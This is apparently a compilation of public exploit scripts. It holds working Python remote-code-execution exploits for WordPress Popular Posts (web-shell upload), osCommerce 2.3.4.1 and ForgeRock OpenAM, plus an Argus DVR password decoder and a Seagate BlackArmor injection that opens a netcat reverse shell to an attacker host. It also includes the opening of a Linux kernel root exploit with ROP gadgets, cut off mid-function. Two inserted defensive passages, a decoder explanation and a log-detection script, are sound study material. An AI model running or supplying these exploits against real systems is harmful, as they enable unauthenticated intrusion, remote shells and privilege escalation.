header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
header.pop('X-HTTP-Method-Override')
header['Accept']='*/*'
header['X-Requested-With'] = 'XMLHttpRequest'
body = {
    '_ajax_nonce': 0,
    'action': 'add-meta',
    'metakeyselect': 'wpp_thumbnail',
    'metakeyinput': "",
    'metavalue' : PHP_URL,
    '_ajax_nonce-add-meta': ajax_nonce,
    'post_id' : post_ID
}
new_post_page = session.post(new_post_url, headers=header, data=body).text
if new_post_page.find("<tr id='meta-") > 0:
    print(f'[+] Added a new Custom Field with the uploaded web shell.')
else:
    print('[-] Error while adding the custom field !')
    print(new_post_page)
    exit()

'''
Give it some views to pop it up in the recent posts
'''
print(f'[+] Giving the new post some views (10) [ ', end="")
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID
redirect_url = session.get(new_post_url).url
new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts'
data = {
    '_wpnonce': wp_nonce,
    'wpp_id': post_ID,
    'sampling': 0,
    'sampling_rate': 100
}
for progress in range(10):
    session.get(redirect_url)
    res = session.post(new_post_plugin_url, headers=header, data=data)
    print ('=', end='')
print(' ] '+json.loads(res.text)['results'])

print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
print('')
-
osCommerce 2.3.4.1 - Remote Code Execution (2)
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows

import requests
import sys

if(len(sys.argv) != 2):
    print("please specify the osCommerce url")
    print("format: python3 osCommerce2_3_4RCE.py <url>")
    print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
    sys.exit(0)

baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'

def rce(command):
    #targeting the finish step which is step 4
    targetUrl = baseUrl + '/install/install.php?step=4'

    payload = "');"
    payload += "passthru('" + command + "');" # injecting system command here
    payload += "/*"

    #injecting parameter
    data = {
        'DIR_FS_DOCUMENT_ROOT': './',
        'DB_DATABASE' : payload
    }

    response = requests.post(targetUrl, data=data)
    if(response.status_code == 200):
        #print('[*] Successfully injected payload to config file')
        readCMDUrl = baseUrl + '/install/includes/configure.php'
        cmd = requests.get(readCMDUrl)
        commandRsl = cmd.text.split('\n')
        if(cmd.status_code == 200):
            #print('[*] System Command Execution Completed')
            #removing the error message above
            for i in range(2, len(commandRsl)):
                print(commandRsl[i])
        else:
            return '[!] Configure.php not found'
    else:
        return '[!] Fail to inject payload'

#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)

#checking the install directory still exist or able to access or not
if(test.status_code == 200):
    print('[*] Install directory still available, the host likely vulnerable to the exploit.')

    #testing system command injection
    print('[*] Testing injecting system command to test vulnerability')
    cmd = 'whoami'
    print('User: ', end='')
    err = rce(cmd)
    if(err != None):
        print(err)
        sys.exit(0)

    while(True):
        cmd = input('RCE_SHELL$ ')
        err = rce(cmd)
        if(err != None):
            print(err)
            sys.exit(0)
else:
    print('[!] Install directory not found, the host is not vulnerable')
    sys.exit(0)
-
ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: ForgeRock Access Manager/OpenAM 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 2021-07-14
# Exploit Author: Photubias – tijl[dot]deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://backstage.forgerock.com/knowledge/kb/article/a47894244
# Vendor Homepage: https://github.com/OpenIdentityPlatform/OpenAM/
# Version: [1] OpenAM 14.6.3
#          [2] Forgerock 6.0.0.x and all versions of 6.5, up to and including 6.5.3, and is fixed as of version AM 7 released on June 29, 2021
# Tested on: OpenAM 14.6.3 and Tomcat/8.5.68 with JDK-8u292 on Debian 10
# CVE: CVE-2021-35464

#!/usr/bin/env python3
'''
    Copyright 2021 Photubias(c)

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2021-35464.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be

    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    Rewritten from and full credits to @Y4er_ChaBug: https://github.com/Y4er/openam-CVE-2021-35464
    and of course the discoverer @artsploit: https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464

    Created using https://github.com/frohoff/ysoserial
'''
import urllib.request, urllib.parse, urllib.error, ssl, sys, optparse

## Static vars; change at will, but recommend leaving as is
sURL = 'http://192.168.0.100:7080/openam'
sEndpoint = 'ccversion/Version'
sEndpoint = 'oauth2/..;/ccversion/Version' ## This bypasses potential WAFs
iTimeout = 5
strSerializedPayload = b'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$'

## Ignore unsigned certs, if any because OpenAM is default HTTP
ssl._create_default_https_context = ssl._create_unverified_context

def checkParams(options, args):
    if args:
        sHost = args[0]
    else:
        sHost = input('[?] Please enter the URL ['+sURL+'] : ')
        if sHost == '': sHost = sURL
    if not sHost[-1:] == '/': sHost += '/'
    if not sHost[:4].lower() == 'http': sHost = 'http://' + sHost
    if options.command: sCMD = options.command
    else: sCMD = ''
    if options.proxy: sProxy = options.proxy
    else: sProxy = ''
    return (sHost, sCMD, sProxy)

def findEndpoint(oOpener, sHost, sProxy):
    def testEndpoint(sURL):
        oRequest = urllib.request.Request(sURL)
        if sProxy: oRequest.set_proxy(sProxy, 'http')
        try: oResponse = oOpener.open(oRequest, timeout = iTimeout)
        except: return False
        if oResponse.code == 200:
            if 'ForgeRock' in oResponse.read().decode(errors='ignore'):
                print('[+] Found potential vulnerable endpoint: ' + sURL)
                return True
        return False
    if testEndpoint(sHost + sEndpoint): return sHost + sEndpoint
    elif testEndpoint(sHost + 'openam/' + sEndpoint): return sHost + 'openam/' + sEndpoint
    elif testEndpoint(sHost + 'OpenAM/' + sEndpoint): return sHost + 'OpenAM/' + sEndpoint
    elif testEndpoint(sHost + 'openam/ccversion/Version'): return sHost + 'openam/ccversion/Version'
    elif testEndpoint(sHost + 'OpenAM/ccversion/Version'): return sHost + 'OpenAM/ccversion/Version'
    else: return ''

def testVuln(oOpener, sURL, sProxy):
    oResponse = runCmd(oOpener, sURL, sProxy, 'echo CVE-2021-35464')
    ## The response is actually not well formed HTTP, needs manual formatting
    bResp = bytearray(15) ## "CVE-2021-35464\n" should be 15 bytes
    try: oResponse.readinto(bResp)
    except: pass
    #print(bResp.split(b'\x00')[0])
    if 'CVE-2021-35464' in bResp.decode(): return True
    else: return False

def runVuln(oOpener, sURL, sProxy, sCMD):
    oResponse = runCmd(oOpener, sURL, sProxy, sCMD)
    ## The response is actually not well formed HTTP, needs manual formatting
    bResp = bytearray(4096)
    try: oResponse.readinto(bResp)
    except: pass ## The readinto still should have worked
    sResp = bResp.split(b'\x00')[0].decode()
    print(sResp)

def runCmd(oOpener, sURL, sProxy, sCMD):
    oData = b'jato.pageSession=' + strSerializedPayload
    oHeaders = {'cmd' : sCMD}
    oRequest = urllib.request.Request(url = sURL, headers = oHeaders, data = oData)
    if sProxy: oRequest.set_proxy(sProxy, 'http')
    return oOpener.open(oRequest, timeout = iTimeout)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        'Example: CVE-2021-35464.py -c id http://192.168.0.100:7080/openam\n'
        'Example: CVE-2021-35464.py -c dir -p 127.0.0.1:8080 http://192.168.0.100:7080/openam\n'
        'When in doubt, just enter a single IP address'
    )
    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--command', '-c', dest='command', help='Optional: The command to run remotely')
    parser.add_option('--proxy', '-p', dest='proxy', help='Optional: HTTP proxy to use, e.g. 127.0.0.1:8080')

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sCMD, sProxy) = checkParams(options, args)

    ## Verify reachability
    print('[!] Verifying reachability of ' + sHost)
    oOpener = urllib.request.build_opener()
    oRequest = urllib.request.Request(sHost)
    if sProxy: oRequest.set_proxy(sProxy, 'http')
    try: oResponse = oOpener.open(oRequest, timeout = iTimeout)
    except urllib.error.HTTPError: pass
    except: sys.exit('[-] Error, host ' + sHost + ' seems to be unreachable')
    print('[+] Endpoint ' + sHost + ' reachable')

    ## Find endpoint
    print('[!] Finding correct OpenAM endpoint')
    sEndpoint = findEndpoint(oOpener, sHost, sProxy)
    if sEndpoint == '': sys.exit('[-] Error finding the correct OpenAM endpoint or not vulnerable.')

    ## Verify vulnerability
    if testVuln(oOpener, sEndpoint, sProxy): print('[+] !SUCCESS! Host ' + sHost + ' is vulnerable to CVE-2021-35464')
    else: sys.exit('[-] Not vulnerable or this implementation does not work')

    if sCMD:
        print('[+] Running command "' + sCMD + '" now:\n')
        runVuln(oOpener, sEndpoint, sProxy, sCMD)
    else:
        print('[!] All done')

if __name__ == "__main__":
    main()
-
Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Title: Argus Surveillance DVR 4.0 - Weak Password Encryption
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 12.07.2021
# Version: Argus Surveillance DVR 4.0
# Tested on: Windows 7 x86 (Build 7601) & Windows 10
# Reference: https://deathflash1411.github.io/blog/dvr4-hash-crack
# Note: Argus Surveillance DVR 4.0 configuration is present in
#       C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini

# I'm too lazy to add special characters :P
# Each password character is stored as one fixed 4-hex-digit token; the table
# maps token -> character (the '!' entry was key/value-swapped in the original).
characters = {
    'ECB4':'1','B4A1':'2','F539':'3','53D1':'4','894E':'5',
    'E155':'6','F446':'7','C48C':'8','8797':'9','BD8F':'0',
    'C9F9':'A','60CA':'B','E1B0':'C','FE36':'D','E759':'E',
    'E9FA':'F','39CE':'G','B434':'H','5E53':'I','4198':'J',
    '8B90':'K','7666':'L','D08F':'M','97C0':'N','D869':'O',
    '7357':'P','E24A':'Q','6888':'R','4AC3':'S','BE3D':'T',
    '8AC5':'U','6FE0':'V','6069':'W','9AD0':'X','D8E1':'Y','C9C4':'Z',
    'F641':'a','6C6A':'b','D9BD':'c','418D':'d','B740':'e',
    'E1D0':'f','3CD9':'g','956B':'h','C875':'i','696C':'j',
    '906B':'k','3F7E':'l','4D7B':'m','EB60':'n','8998':'o',
    '7196':'p','B657':'q','CA79':'r','9083':'s','E03B':'t',
    'AAFE':'u','F787':'v','C165':'w','A935':'x','B734':'y','E4BC':'z',
    'B398':'!'}

# ASCII art is important xD
banner = '''
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____ __ __  ______  #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#       Weak Password Encryption        #
############ @deathflash1411 ############
'''
print(banner)

# Change this :)
pass_hash = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"

if (len(pass_hash)%4) != 0:
    print("[!] Error, check your password hash")
    exit()

# Split the stored value into 4-hex-digit tokens and look each one up.
split = []
n = 4
for index in range(0, len(pass_hash), n):
    split.append(pass_hash[index : index + n])

for key in split:
    if key in characters.keys():
        print("[+] " + key + ":" + characters[key])
    else:
        print("[-] " + key + ":Unknown")
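The advisory's script decodes one stored value with a hard-coded table. The point a practitioner should take away is why the scheme is weak: each character becomes a fixed 4-hex-digit token with no key, salt or IV, so identical passwords yield identical stored values on every install, and anyone who can set a password on one install can recover the table for every character that password contains. The following example, added here and not part of the advisory, makes that concrete: it decodes with the known table, reports unknown tokens, and learns new table entries from (plaintext, stored value) pairs. The seed table is the advisory's; the `'a!'` pair used to learn the `!` token is constructed for this example, not taken from a real configuration.

```python
TOKEN_LEN = 4  # hex digits per password character in DVRParams.ini

# Token -> character table from the advisory above (the '!' entry included).
SEED_TABLE = {
    'ECB4': '1', 'B4A1': '2', 'F539': '3', '53D1': '4', '894E': '5',
    'E155': '6', 'F446': '7', 'C48C': '8', '8797': '9', 'BD8F': '0',
    'C9F9': 'A', '60CA': 'B', 'E1B0': 'C', 'FE36': 'D', 'E759': 'E',
    'E9FA': 'F', '39CE': 'G', 'B434': 'H', '5E53': 'I', '4198': 'J',
    '8B90': 'K', '7666': 'L', 'D08F': 'M', '97C0': 'N', 'D869': 'O',
    '7357': 'P', 'E24A': 'Q', '6888': 'R', '4AC3': 'S', 'BE3D': 'T',
    '8AC5': 'U', '6FE0': 'V', '6069': 'W', '9AD0': 'X', 'D8E1': 'Y', 'C9C4': 'Z',
    'F641': 'a', '6C6A': 'b', 'D9BD': 'c', '418D': 'd', 'B740': 'e',
    'E1D0': 'f', '3CD9': 'g', '956B': 'h', 'C875': 'i', '696C': 'j',
    '906B': 'k', '3F7E': 'l', '4D7B': 'm', 'EB60': 'n', '8998': 'o',
    '7196': 'p', 'B657': 'q', 'CA79': 'r', '9083': 's', 'E03B': 't',
    'AAFE': 'u', 'F787': 'v', 'C165': 'w', 'A935': 'x', 'B734': 'y', 'E4BC': 'z',
}

# The sample value the advisory decodes ("deathflash1411").
PAGE_HASH = "418DB740F641E03B956BE1D03F7EF6419083956BECB453D1ECB4ECB4"


def tokens(stored_hex):
    """Split a stored value into its fixed-width tokens (upper-cased)."""
    if len(stored_hex) % TOKEN_LEN:
        raise ValueError("stored value must be a multiple of %d hex digits" % TOKEN_LEN)
    return [stored_hex[i:i + TOKEN_LEN].upper() for i in range(0, len(stored_hex), TOKEN_LEN)]


def decode(stored_hex, table):
    """Return (plaintext with '?' for unmapped tokens, list of unmapped tokens)."""
    out, unknown = [], []
    for tok in tokens(stored_hex):
        ch = table.get(tok)
        if ch is None:
            unknown.append(tok)
            out.append('?')
        else:
            out.append(ch)
    return ''.join(out), unknown


def learn(table, known_pairs):
    """Extend a token->char table from (plaintext, stored value) pairs.

    Because the scheme is a per-character substitution, token i of the
    stored value always corresponds to character i of the plaintext.  A
    conflict with an existing entry would mean the scheme is not a plain
    substitution after all, so it is reported rather than overwritten."""
    learned = dict(table)
    for plaintext, stored_hex in known_pairs:
        toks = tokens(stored_hex)
        if len(toks) != len(plaintext):
            raise ValueError("token count does not match plaintext length")
        for tok, ch in zip(toks, plaintext):
            if learned.get(tok, ch) != ch:
                raise ValueError("conflicting mapping for token %s" % tok)
            learned[tok] = ch
    return learned


def encode(plaintext, table):
    """Produce the stored form of a password: shows the scheme is deterministic
    (same password, same stored value, on every install)."""
    inverse = {ch: tok for tok, ch in table.items()}
    return ''.join(inverse[ch] for ch in plaintext)


if __name__ == "__main__":
    print(decode(PAGE_HASH, SEED_TABLE))
    # Constructed known pair: an account whose password was set to 'a!'.
    full = learn(SEED_TABLE, [("a!", "F641B398")])
    print(decode("F641B398", full))
```

To fill in the characters the advisory's table omits, set a test account's password to a string covering the missing characters, read the stored value back from DVRParams.ini, and feed the pair to `learn()`.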
-
Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
# Date: 15.07.2021
# Discovered by: Jeroen - IT Nerdbox
# Exploit Author: Metin Yunus Kandemir
# Version: sg2000-2000.1331
# Vendor Homepage: https://www.seagate.com/
# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/

#!/usr/bin/python3
import requests
import sys

def exec(target, ncIp, ncPort):
    print("[!] Please check netcat listener: "+ ncPort)
    # The 'session' parameter is passed to a shell unsanitised; ';' chains the
    # reverse shell and the trailing NUL cuts off whatever the script appends.
    url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"
    r = requests.get(url = url)
    sys.exit(1)

def main(args):
    if len(args) != 4:
        print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))
        print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")
        sys.exit(1)
    exec(target=args[1], ncIp=args[2], ncPort=args[3])

if __name__ == "__main__":
    main(args=sys.argv)
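Both of the unauthenticated RCEs above leave a recognisable trace in a web server access log, and both need a little normalisation before a rule will match: the OpenAM exploit reaches `ccversion/Version` through an `oauth2/..;/` prefix (its own comment says this is there to get past WAFs; Tomcat treats `;...` as a path parameter and then resolves the `..`), and the BlackArmor payload hides its shell metacharacters and NUL byte behind URL encoding in the `session` parameter. The example below, added here and not part of either advisory, parses combined-format log lines, normalises the path the way Tomcat would, decodes the query string by hand (`urllib.parse.parse_qs` historically split on `;` too, which would cut the injection in half) and applies one rule per vector. The sample log lines are constructed for this example, not captured traffic.

```python
import re
import posixpath
from urllib.parse import unquote, unquote_plus, urlsplit

# Apache/Tomcat combined log format: the fields this triage needs.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Characters that terminate or chain a shell command, plus NUL.
SHELL_META = re.compile(r'[;&|`$\n]|\x00')

# Constructed sample lines (not real traffic): two routes to the OpenAM
# endpoint, one BlackArmor injection, two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jul/2021:10:01:02 +0000] "POST /openam/oauth2/..;/ccversion/Version HTTP/1.1" 200 0',
    '10.0.0.5 - - [14/Jul/2021:10:01:03 +0000] "GET /openam/ccversion/Version HTTP/1.1" 200 1432',
    '10.0.0.9 - - [15/Jul/2021:08:00:00 +0000] "GET /backupmgt/localJob.php?session=fail;nc+10.0.0.9+4444+-e+/bin/sh%00 HTTP/1.1" 200 12',
    '10.0.0.7 - - [15/Jul/2021:08:00:05 +0000] "GET /backupmgt/localJob.php?session=abc123 HTTP/1.1" 200 12',
    '10.0.0.7 - - [15/Jul/2021:08:00:06 +0000] "GET /openam/XUI/ HTTP/1.1" 200 5120',
]


def normalize_path(raw_path):
    """Normalise the way Tomcat does before routing: drop ';...' path
    parameters from every segment, percent-decode, then collapse '..'."""
    segments = [seg.split(';', 1)[0] for seg in raw_path.split('/')]
    return posixpath.normpath(unquote('/'.join(segments)))


def parse_query(query):
    """Split only on '&' and decode '+' and %XX, so ';' inside a value survives."""
    params = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params


def parse_line(line):
    """Return a dict with src, method, path (normalised), query, status; or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['uri'])
    rec['path'] = normalize_path(parts.path)
    rec['query'] = parse_query(parts.query)
    return rec


def classify(rec):
    """Apply the two rules derived from the exploits; return the rule names hit."""
    hits = []
    if rec['path'].endswith('/ccversion/Version'):
        hits.append('openam_ccversion')          # CVE-2021-35464 endpoint
    if rec['path'].endswith('/backupmgt/localJob.php'):
        if any(SHELL_META.search(v) for v in rec['query'].get('session', [])):
            hits.append('blackarmor_cmdinj')     # shell metachar / NUL in 'session'
    return hits


def triage(line):
    """Rule hits for one log line, [] if clean, None if the line did not parse."""
    rec = parse_line(line)
    return None if rec is None else classify(rec)


def scan(lines):
    """Return [(src, normalised path, hits)] for every line that matched a rule."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append((rec['src'], rec['path'], hits))
    return findings


if __name__ == "__main__":
    for src, path, hits in scan(SAMPLE_LOG):
        print(src, path, ','.join(hits))
```

Run it over a real access log with `scan(open(path))`; the `openam_ccversion` rule is deliberately broad (it also catches benign GETs) because the exploit's POST body, where the serialised payload travels, is not logged.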
-
Linux Kernel 2.6.19 < 5.9 - 'Netfilter' Local Privilege Escalation
/*
 * CVE-2021-22555: Turning \x00\x00 into 10000$
 * by Andy Nguyen (theflow@)
 *
 * theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
 * theflow@theflow:~$ ./exploit
 * [+] Linux Privilege Escalation by theflow@ - 2021
 *
 * [+] STAGE 0: Initialization
 * [*] Setting up namespace sandbox...
 * [*] Initializing sockets and message queues...
 *
 * [+] STAGE 1: Memory corruption
 * [*] Spraying primary messages...
 * [*] Spraying secondary messages...
 * [*] Creating holes in primary messages...
 * [*] Triggering out-of-bounds write...
 * [*] Searching for corrupted primary message...
 * [+] fake_idx: ffc
 * [+] real_idx: fc4
 *
 * [+] STAGE 2: SMAP bypass
 * [*] Freeing real secondary message...
 * [*] Spraying fake secondary messages...
 * [*] Leaking adjacent secondary message...
 * [+] kheap_addr: ffff91a49cb7f000
 * [*] Freeing fake secondary messages...
 * [*] Spraying fake secondary messages...
 * [*] Leaking primary message...
 * [+] kheap_addr: ffff91a49c7a0000
 *
 * [+] STAGE 3: KASLR bypass
 * [*] Freeing fake secondary messages...
 * [*] Spraying fake secondary messages...
 * [*] Freeing sk_buff data buffer...
 * [*] Spraying pipe_buffer objects...
 * [*] Leaking and freeing pipe_buffer object...
 * [+] anon_pipe_buf_ops: ffffffffa1e78380
 * [+] kbase_addr: ffffffffa0e00000
 *
 * [+] STAGE 4: Kernel code execution
 * [*] Spraying fake pipe_buffer objects...
 * [*] Releasing pipe_buffer objects...
 * [*] Checking for root...
 * [+] Root privileges gained.
 *
 * [+] STAGE 5: Post-exploitation
 * [*] Escaping container...
 * [*] Cleaning up...
 * [*] Popping root shell...
 * root@theflow:/# id
 * uid=0(root) gid=0(root) groups=0(root)
 * root@theflow:/#
 *
 * Exploit tested on Ubuntu 5.8.0-48-generic and COS 5.4.89+.
 */

// clang-format off
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <net/if.h>
#include <netinet/in.h>

#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/socket.h>
#include <sys/syscall.h>

#include <linux/netfilter_ipv4/ip_tables.h>
// clang-format on

#define PAGE_SIZE 0x1000

#define PRIMARY_SIZE 0x1000
#define SECONDARY_SIZE 0x400

#define NUM_SOCKETS 4
#define NUM_SKBUFFS 128
#define NUM_PIPEFDS 256
#define NUM_MSQIDS 4096

#define HOLE_STEP 1024

#define MTYPE_PRIMARY 0x41
#define MTYPE_SECONDARY 0x42
#define MTYPE_FAKE 0x1337

#define MSG_TAG 0xAAAAAAAA

// #define KERNEL_COS_5_4_89 1
#define KERNEL_UBUNTU_5_8_0_48 1

// clang-format off
#ifdef KERNEL_COS_5_4_89
// 0xffffffff810360f8 : push rax ; jmp qword ptr [rcx]
#define PUSH_RAX_JMP_QWORD_PTR_RCX 0x360F8
// 0xffffffff815401df : pop rsp ; pop rbx ; ret
#define POP_RSP_POP_RBX_RET 0x5401DF
// 0xffffffff816d3a65 : enter 0, 0 ; pop rbx ; pop r14 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R14_POP_RBP_RET 0x6D3A65
// 0xffffffff814ddfa8 : mov qword ptr [r14], rbx ; pop rbx ; pop r14 ; pop rbp ; ret
#define MOV_QWORD_PTR_R14_RBX_POP_RBX_POP_R14_POP_RBP_RET 0x4DDFA8
// 0xffffffff81073972 : push qword ptr [rbp + 0x25] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_25_POP_RBP_RET 0x73972
// 0xffffffff8106748c : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x6748C
// 0xffffffff810c7c80 : pop rdx ; ret
#define POP_RDX_RET 0xC7C80
// 0xffffffff8143a2b4 : pop rsi ; ret
#define POP_RSI_RET 0x43A2B4
// 0xffffffff81067520 : pop rdi ; ret
#define POP_RDI_RET 0x67520
// 0xffffffff8100054b : pop rbp ; ret
#define POP_RBP_RET 0x54B
// 0xffffffff812383a6 : mov rdi, rax ; jne 0xffffffff81238396 ; pop rbp ; ret
#define MOV_RDI_RAX_JNE_POP_RBP_RET 0x2383A6
// 0xffffffff815282e1 : cmp rdx, 1 ; jne 0xffffffff8152831d ; pop rbp ; ret
#define CMP_RDX_1_JNE_POP_RBP_RET 0x5282E1
#define FIND_TASK_BY_VPID 0x963C0
#define SWITCH_TASK_NAMESPACES 0x9D080
#define COMMIT_CREDS 0x9EC10
#define PREPARE_KERNEL_CRED 0x9F1F0
#define ANON_PIPE_BUF_OPS 0xE51600
#define INIT_NSPROXY 0x1250590
#elif KERNEL_UBUNTU_5_8_0_48
// 0xffffffff816e9783 : push rsi ; jmp qword ptr [rsi + 0x39]
#define PUSH_RSI_JMP_QWORD_PTR_RSI_39 0x6E9783
// 0xffffffff8109b6c0 : pop rsp ; ret
#define POP_RSP_RET 0x9B6C0
// 0xffffffff8106db59 : add rsp, 0xd0 ; ret
#define ADD_RSP_D0_RET 0x6DB59
// 0xffffffff811a21c3 : enter 0, 0 ; pop rbx ; pop r12 ; pop rbp ; ret
#define ENTER_0_0_POP_RBX_POP_R12_POP_RBP_RET 0x1A21C3
// 0xffffffff81084de3 : mov qword ptr [r12], rbx ; pop rbx ; pop r12 ; pop rbp ; ret
#define MOV_QWORD_PTR_R12_RBX_POP_RBX_POP_R12_POP_RBP_RET 0x84DE3
// 0xffffffff816a98ff : push qword ptr [rbp + 0xa] ; pop rbp ; ret
#define PUSH_QWORD_PTR_RBP_A_POP_RBP_RET 0x6A98FF
// 0xffffffff810891bc : mov rsp, rbp ; pop rbp ; ret
#define MOV_RSP_RBP_POP_RBP_RET 0x891BC
// 0xffffffff810f5633 : pop rcx ; ret
#define POP_RCX_RET 0xF5633
// 0xffffffff811abaae : pop rsi ; ret
#define POP_RSI_RET 0x1ABAAE
// 0xffffffff81089250 : pop rdi ; ret
#define POP_RDI_RET 0x89250
// 0xffffffff810005ae : pop rbp ; ret
#define POP_RBP_RET 0x5AE
// 0xffffffff81557894 : mov rdi, rax ; jne 0xffffffff81557888 ; xor eax, eax ; ret
#define MOV_RDI_RAX_JNE_XOR_EAX_EAX_RET 0x557894
// 0xffffffff810724db : cmp rcx, 4 ; jne 0xffffffff810724c0 ; pop rbp ; ret
#define CMP_RCX_4_JNE_POP_RBP_RET 0x724DB
#define FIND_TASK_BY_VPID 0xBFBC0
#define SWITCH_TASK_NAMESPACES 0xC7A50
#define COMMIT_CREDS 0xC8C80
#define PREPARE_KERNEL_CRED 0xC9110
#define ANON_PIPE_BUF_OPS 0x1078380
#define INIT_NSPROXY 0x1663080
#else
#error "No kernel version defined"
#endif
// clang-format on

#define SKB_SHARED_INFO_SIZE 0x140

#define MSG_MSG_SIZE (sizeof(struct msg_msg))
#define MSG_MSGSEG_SIZE (sizeof(struct msg_msgseg))

struct msg_msg {
  uint64_t m_list_next;
  uint64_t m_list_prev;
  uint64_t m_type;
  uint64_t m_ts;
  uint64_t next;
  uint64_t security;
};

struct msg_msgseg {
  uint64_t next;
};

struct pipe_buffer {
  uint64_t page;
  uint32_t offset;
  uint32_t len;
  uint64_t ops;
  uint32_t flags;
  uint32_t pad;
  uint64_t private;
};

struct pipe_buf_operations {
  uint64_t confirm;
  uint64_t release;
  uint64_t steal;
  uint64_t get;
};

struct {
  long mtype;
  char mtext[PRIMARY_SIZE - MSG_MSG_SIZE];
} msg_primary;

struct {
  long mtype;
  char mtext[SECONDARY_SIZE - MSG_MSG_SIZE];
} msg_secondary;

struct {
  long mtype;
  char mtext[PAGE_SIZE - MSG_MSG_SIZE + PAGE_SIZE - MSG_MSGSEG_SIZE];
} msg_fake;

void build_msg_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev, uint64_t m_ts, uint64_t next) {
  msg->m_list_next = m_list_next;
  msg->m_list_prev = m_list_prev;
  msg->m_type = MTYPE_FAKE;
  msg->m_ts = m_ts;
  msg->next = next;
  msg->security = 0;
}

int write_msg(int msqid, const void *msgp, size_t msgsz, long msgtyp) {
  *(long *)msgp = msgtyp;
  if (msgsnd(msqid, msgp, msgsz - sizeof(long), 0) < 0) {
    perror("[-] msgsnd");
    return -1;
  }
  return 0;
}

int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, MSG_COPY | IPC_NOWAIT) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp) {
  if (msgrcv(msqid, msgp, msgsz - sizeof(long), msgtyp, 0) < 0) {
    perror("[-] msgrcv");
    return -1;
  }
  return 0;
}

int spray_skbuff(int ss[NUM_SOCKETS][2], const void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (write(ss[i][0], buf, size) < 0) {
        perror("[-] write");
        return -1;
      }
    }
  }
  return 0;
}

int free_skbuff(int ss[NUM_SOCKETS][2], void *buf, size_t size) {
  for (int i = 0; i < NUM_SOCKETS; i++) {
    for (int j = 0; j < NUM_SKBUFFS; j++) {
      if (read(ss[i][1], buf, size) < 0) {
        perror("[-] read");
        return -1;
      }
    }
  }
  return 0;
}

int trigger_oob_write(int s) {
